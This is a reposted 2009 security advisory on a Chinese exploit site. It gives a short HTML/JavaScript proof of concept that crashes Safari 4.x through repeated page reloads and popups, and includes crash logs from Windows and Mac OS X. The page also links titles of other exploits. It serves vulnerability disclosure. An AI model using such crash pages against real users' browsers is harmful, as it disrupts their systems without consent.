首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Apple Safari 4.x JavaScript Reload Remote Crash Exploit
来源:mail [at] marcell-dietl [dot] de 作者:Marcell 发布时间:2009-07-03  

___________________________________________________________________________________

Apple Safari 4.x JavaScript Reload Denial of Service
___________________________________________________________________________________

Author   : Marcell 'SkyOut' Dietl, Achim Hoffmann
Email    : mail [at] marcell-dietl [dot] de
Vendor   : http://www.apple.com/
Product  : http://www.apple.com/safari/
Found    : 12.06.2009
Released : 01.07.2009

Tested on:
 - Safari 4.0 at Windows XP SP3
 - Safari 4.0.1 at Mac OS X 10.5.7
___________________________________________________________________________________
STEPS TO REPRODUCE

1) Create a HTML file with the following content:

+----------
| <html>
| <body>
| <script src="empty.js"></script>
| <script>
| try { crashSafari(); } catch(e) {
| setTimeout("location.reload();",42);
| prompt('apple culpa? comment:'); }
| </script>
| </body>
| </html>
+----------

2) Create an empty file called "empty.js" in the same directory.

3) Put both files into the WWW directory of your server.

4) Access the HTML file with your browser.
   - A popup will appear: Close it.
   - A popup will appear: Close it.
   - Crash.

5) On Windows:

+----------
| AppName: safari.exe      AppVer: 4.530.17.0      ModName: webkit.dll
| ModVer: 4.530.17.0       Offset: 00305f55
+----------

5) On Mac OS X:

+----------
| Process:         Safari [298]
| Path:            /Applications/Safari.app/Contents/MacOS/Safari
| Identifier:      com.apple.Safari
| Version:         4.0.1 (5530.18)
| Build Info:      WebBrowser-55301800~1
| Code Type:       X86 (Native)
| Parent Process:  launchd [163]
|
| Date/Time:       2009-07-01 00:58:48.144 +0200
| OS Version:      Mac OS X 10.5.7 (9J61)
| Report Version:  6
|
| Exception Type:  EXC_BAD_ACCESS (SIGBUS)
| Exception Codes: KERN_PROTECTION_FAILURE at 0x0000000000000002
|
| Thread 0 crashed with X86 Thread State (32-bit):
|   eax: 0x00000002  ebx: 0x900bac11  ecx: 0x00625eec  edx: 0x00000000
|   edi: 0x00625ec8  esi: 0x00000002  ebp: 0xbfffe778  esp: 0xbfffe5e0
|    ss: 0x0000001f  efl: 0x00010217  eip: 0x900bac74   cs: 0x00000017
|    ds: 0x0000001f   es: 0x0000001f   fs: 0x00000000   gs: 0x00000037
|   cr2: 0x00000002
+----------
___________________________________________________________________________________
Advisory  : http://marcell-dietl.de/index/adv_safari_4_x_js_reload_dos.php

Live Demo : http://marcell-dietl.de/index/demo_safari_4_x_js_reload_dos.html

Apple has been informed about the bug, but did not show any interest.
___________________________________________________________________________________
HAVING FUN WITH FULL DISCLOSURE SINCE 2006


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·fipsCMS Light version 2.1 arbi
·Oracle 10g SYS.LT.COMPRESSWORK
·AudioPLUS 2.00.215 (.pls) Loca
·YourTube <= 2.0 Arbitrary Data
·ARD-9808 DVR Card Security Cam
·Almnzm 2.0 Remote Blind SQL In
·Green Dam Remote Change System
·win32 xp-sp3 beep and exitproc
·AudioPLUS 2.00.215 (.lst & .m3
·Joomla! versions prior to 1.5.
·Messages Library 2.0 Arbitrary
·PEamp 1.02b (.M3U File) Local
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved